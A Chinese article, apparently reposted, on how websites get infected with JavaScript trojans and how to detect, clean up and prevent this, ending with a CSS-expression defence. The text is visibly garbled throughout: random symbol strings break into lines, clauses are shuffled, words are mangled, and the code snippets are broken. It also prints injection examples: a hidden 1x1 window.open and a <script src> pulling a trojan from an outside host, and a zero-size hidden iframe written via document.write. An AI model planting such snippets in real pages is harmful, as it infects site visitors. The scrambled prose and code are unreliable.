|
网站被JS挂马解决方法
% N/ v/ c& Z1 Z/ L V为什么网页挂马还是屡见不鲜?这恐怕就要说一说 CSS 挂马了下面我详细讨论 虽然能够巧妙地利用 CSS 代码防范 7 G, X( P( ?) b/ _
IFRAME 和 JS 脚本挂马。 ; |* W2 g$ P- y' v4 q3 S
检测网页木马也是很重要的一项工作,目前流行的网站被黑,相应的 asp,
; C+ n/ o \) Z; f8 x6 r$ j" v% f' O网站优化设计当中。htm,j 等文件中,插入以 js 调用方式的本文主要介绍网页挂马的种类、如何检测网页是否被挂马、
. ~6 }4 }; ~3 @: O: _! b) V如何清除网页木马。如何防止网页被挂马。 1: 网页挂马的种类 . 1 H7 L8 Y( }9 Z' y* a0 R. J
相应的 asp, 目前流行的网站被黑。htm,j 等文件中,插入以 js 调用方式的
/ l+ ?& z* E2 `- L, R0 ?卢松松以前做过的极品源码下载站 ’ 就遇到过 JS 挂马 1 \% ^) ?' D7 V1 \) V) r# f
利用动网程序漏洞 ( 上传附件漏洞 ) 拥有网站管理员权限。删了论坛几千条数据 , 校园闹翻天论坛 ’ 就遇到用户提权
+ S4 o- t3 a+ ?: E: C! [8 t。一千多位会员的 ID ! Q) {- W; z; _- I. |5 u, q X
2: 如何检测网页是否被挂马。 ) X4 T2 o; A' y
六款免费网页平安检测工具横向测评 ( 华军软件园 ) 1 专业检测工具。>
& |" }' n) j" t% g8 S或者可以利用 Googl 搜索你网站、博客进行检测。如果有网站有木马则 googl 会在搜索列表的下方提示该网站有不安全
. `/ E! U# ~8 V8 Y( n# D _, T因素。 2 googl 检测。>
) A8 t5 V$ Q- ~" A% T8 J常用的杀毒软件也可以检测出来。 3 杀毒软件检测。>
0 j+ z3 `) j# H6 F9 |) J, c6 e+ Y4 G打开你网站、博客, 4 人工检测。点击右键查看源文件,根据网页挂马的种类也可以查看是否中了木马。
2 `* [3 d" G2 o2 E0 H) W5 使用 McAfee SiteAdvisor 平安浏览网页的插件。 2 T4 }4 f0 V0 u( r# Z4 D( Q
7 M5 O4 d: z0 T0 P% X+ ^# K1 e s
3: 如何清除网页木马。
# D$ x) D2 g8 u就看那些文件是最近修改过的主要检查这些新文件, 一旦中了网页木马。从 FTP 中可以检查文件最近修改时间。然后进
7 R0 _2 Q, G! \2 u入源文件把相关的网页挂马种类的可疑代码删除。 6 j! i6 B3 J- o8 L0 d
建议删除所有文件 ( 数据库、图片、文档、顺序模板主题等文件夹可以保留 ) 如果你对你所使用的网站、博客程序不熟 . A. S4 v- V0 A- J+ `
悉。>
: i7 R: ?- X) M* r* W6 B" I0 J/ D2 b' f请从预防开始吧。 4: 如何防止网页被挂马。如果你网站还没有被挂马。>
0 t- t) w3 q* p) u8 X并只允许信任的人使用上传程序。 1 对网友开放上传附件功能的网站一定要进行身份认证。> - M' b4 f$ _- b8 v$ y
2 保证你所使用的顺序及时的更新。
: V8 O/ E5 L/ a3 I+ }3 不要在前台网页上加注后台管理程序登陆页面的链接。
% L. o: K1 r- q' j4 p# z但不要把备份数据库放在顺序默认的备份目录下。 4 要时常备份数据库等重要文件。>
; W) t, I: W- q: b0 k不能过于简单。 5 管理员的用户名和密码要有一定复杂性。>
# p* K0 r9 U6 a) y7 t二项功能组合, 6 IIS 中禁止写入和目录禁止执行的功能。可以有效的防止 ASP 木马。
! m- W3 X2 q8 m. B! h) i3 t5 B( @设置执行权限选项中, 7 可以在服务器、虚拟主机控制面板。直接将有上传权限的目录,取消 ASP 运行权限。
) m' n1 n$ Q1 D! \% I8 创建一个 robots.txt 上传到网站根目录。 Robot 能够有效的防范利用搜索引擎窃取信息的骇客
8 k6 m) q% {$ O- j: s: P$ @6 a+ A' J0 O
IFRAME 挂马比较早, < IFRAME 挂马比较早。相应的预防措施也比较多,其中用 CSS 配合 JS 脚本进行预防是主流方式
, ~6 Z q3 |, t, s& p7 C。可这种预防方式也存在平安隐患, JS 脚本也可以被用来挂马,令人防不胜防。下面要介绍反击 JS 挂马的方法。
* m8 |5 t6 h/ k+ j4 n6 V2 L% @JS 挂马溯源
3 N8 R8 Q3 H+ F# u+ C( z有经验的平安工程师也开始研究相应的对策,当 IFRAME 逐渐被黑客滥用的时候。一段时间内各种阻止 IFRAME 挂马的方 ) ^* e# H) ]9 M8 O/ x
法不时涌现,其中通用性较高的就是利用 CSS 配合 JS 脚本防御 IFRAME 挂马。
" o7 w1 u! E: y3 q, Y; {很多网站都会让网页调用 JS 脚本来实现广告等诸多特效,而黑客也发现。如果将木马挂在 JS 脚本中,所有调用该 JS 6 S& D, k* ^$ e7 _
脚本的网页都等同于被挂上了木马,对于需要肉鸡群的黑客而言是一劳永逸,因此 JS 脚本挂马逐渐开始被黑客应用。
! S E9 H# C9 S8 N- ?& f1 Z* C4 ~& H一种面向对象的脚本语言,小百科: JS 脚本是 JavaScript 脚本语言的简称。目前广泛用于动态网页的编程。需要提示 ' T9 h% g u1 C
大家的 JavaScript 和 Java 除了语法上有一些相似之处,以及都能够当作网页的编程语言以外,两者是完全不相干的而 P/ ~4 n% n+ R8 x1 d
JavaScript 与 Jscript 也不同, Jscript 微软为了迎战 JavaScript 推出的脚本语言。 7 X) l5 T* z; R: Y/ v9 w! Q: S/ t
但是 JavaScript 一门具有丰富特性的语言,虽然 JavaScript 作为给非程序人员的脚本语言向大众推广。有着和其他编 2 d# k+ x1 O: r. n
程语言一样的复杂性。实际上,必需对 JS 有扎实的理解才干用它来编写比较复杂的顺序,作为一名平安工程师,掌握 JS # Y9 K @1 k& D8 m
脚本在工作中会有很大的协助。 * R" x5 G! j* ?! l
挂马原理一点通
0 e* Z+ {% }0 ]9 g/ n/ _可以说优点多得数不过来, JS 脚本挂马对于黑客而言。首先 JS 脚本在挂马时可以直接将 JS 代码写在网页中,也可以 ' B9 g8 D$ U; p5 w- a# J5 c. i, u$ v5 ^
通过注入网页,让网站远程调取异地 JS 脚本。此外, JS 挂马插入 Web 页面的方法有几十种,绝对够菜鸟们眼花缭乱,
& k6 p' A$ W; L$ d$ a* Y9 J' N无从区分木马在何处。
" |* z9 N9 ?* c0 D如同一个穿着鲜红颜色外衣的劫匪, IFRAME 挂马相对于安全工程师而言。招摇而扎眼,很容易被发现。但是利用 JS 挂
/ {8 y, ?5 o* o! ~0 @2 E0 y马就意味着这个劫匪拥有了一张可以随时变换的面孔,而且它还能够随时更换衣服。这样的劫匪在平安工程师搜查时,很
$ D' z- [9 e3 F5 i3 d' Z0 P容易蒙混过关,导致木马久杀不绝。
" R8 Q: E7 A9 L, C$ d" Z1 ]0 pJS 挂马攻防实录
! ?& i% l$ M& [; K; q8 U一种是直接将 JavaScript 脚本代码写在网页中,攻现在最多见的 JS 挂马方法有两种。当访问者在浏览网页时,恶意的
; O- |6 K6 s5 v9 O) i" r! U: ]$ ~挂马脚本就会通过用户的浏览器悄悄地打开网马窗口,隐藏地运行。
% Q; D! u; w6 A8 z; e这种方法使用的关键代码如下:
4 i/ z, D* Z5 W! W1 ~"", window.open "http://www.v404.cn/ 木马 & f3 r! U) E5 c6 g* t9 c2 s- Y
.html"."toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1" ; 9 ]; l( ^- t0 s7 S5 V
, s) s7 \, }9 |
很容易被安全工程师发现,这种代码往往很长。而且没有经验的黑客也喜欢将 “ width 和 “ height= 参数设为 “ 0 7 |; s! ~. r2 A& I% y/ A$ E8 t& g
但是设置为 0 后,可能会出现恶意代码不运行的情况。 ! i1 d, R: s9 X5 c0 Y K
并上传到自己指定的网址。这时黑客只需要在受害者的网站中写入: 另外一种 JS 挂马方式是黑客先将挂马脚本代码 “ . V5 p* D0 |9 r8 a5 X8 Q
document.writ ' < Iframe src=" 网页木马地址 " ></ifram > ' 写入 Window 中的写字板另存为后缀为 .j 脚本文件 . S$ m) ]+ u3 t/ t7 r
。 " f9 o) x' K4 O/ L+ f# N
<script src="http://www.v404.cn/ 木马脚本 .js"></script>
: {% C( w7 n; ^! r- U, N( s; `3 U: O+ d& o7 j$ d. {3 I
或者
' ?; q, d9 }2 J7 udocument.writ "<div style='display:none'>"
! }- D8 D2 b) a, L4 `document.writ "<ifram src=" 网页木马地址 " width="0" height="0" scrolling="no" frameborder="0"></iframe>" ) X( v2 t8 Q. _. C
document.writ "</div>" 1 n3 ~0 g1 y9 |; Y: i; b
& i V0 b, r. y. G& ~& H
就成功地将木马挂到对方的网页中了 ! N& W6 R6 H. K) p: I+ n
例如黑客有可能会将脚本写为: 小提示:黑客还可以根据情况随机变换拔出的 JS 挂马方法。
: T: [1 ], x, {- g<div style="behaviour: url http://www.v404.cn/ 木马脚本 .j ;">
' x* \$ Y9 i) h+ i或者: # X& a3 F# R5 ~/ `9 \
<ifram src="vbscript:[ 挂马脚本 ]">
3 F( c2 H3 |! g5 V1 D/ k; {0 X \, [, l1 e# r# A, u
等等 … 7 v: J0 A; R: d9 f) \, k; ~
不方便,防第一种 JS 挂马方式。用得非常少,而第二种 JS 挂马方式才是当前主流的所以我主要针对它进行防御。方法
7 n8 ]% v/ ^: e/ p- k. E就是阻止 Src 请求的异地外域的 JS 脚本,代码如下: % ?' V" H0 r7 z8 A8 {8 ]! t0 Z
iframe{mdy1:express this.src='about:blank', < iframe{mdy1:express this.src='about:blank'.this.outerHTML='' & b4 P0 h2 U$ i+ U# _, m# x- b9 a9 |& z
;}
7 w4 \1 {, r, V3 Fscript{mzm2:express this.src.toLowerCas .indexOf 'http' ==0 ?document.writ ' 木马被成功隔离 !' :'' ;} $ K7 p+ N1 D' {0 } s8 T4 j7 l
! m7 Y' E7 _* h/ x; S不过这种方法的缺点就是网站的访问者将不能看到被挂了 JS 木马的相关网页。 3 c' o! o: B' E2 A) y
这段代码会让异地外域的 JS 文件在使用 document.writ 时,所以我为安全工程师提供了一段可以中止 JS 脚本运行的
8 \" l9 Q3 V* ?8 N, J! {7 \4 QCSS 代码。被 document.clos 强制关闭。这个时侯 JS 挂马的内容往往还没有来得及写完,只有局部被强制输出了
: i/ Y, p1 n5 _; x& O4 m% vWriter 后面的内容再不会被写入访问者的电脑中,从而起到防范 JS 脚本挂马的作用。
. A% K" ^; r) B" x. l, C<title> 让 JS 挂马中止的 CSS 代码 </title> 1 ]9 g- `* E; ~$ D: r L5 A Q9 ?
<styl type="text/css" id="shudoo">
B' z' L5 z# f9 |& B a/*<![CDATA[*/ $ T) F+ l& b# _* O- V' U: D
this.outerHTML='' ;iframe{mdy1:express this.src='about:blank'.} / l* R5 G; V; e* Y
script{mzm2:express this.src.indexOf 'http' ==0 ?document.clos :'' ;} 6 g9 P! B7 J, p, R. [! R% z
/*]]>*/ * _% p2 o" W: x$ ^; F
</style>
|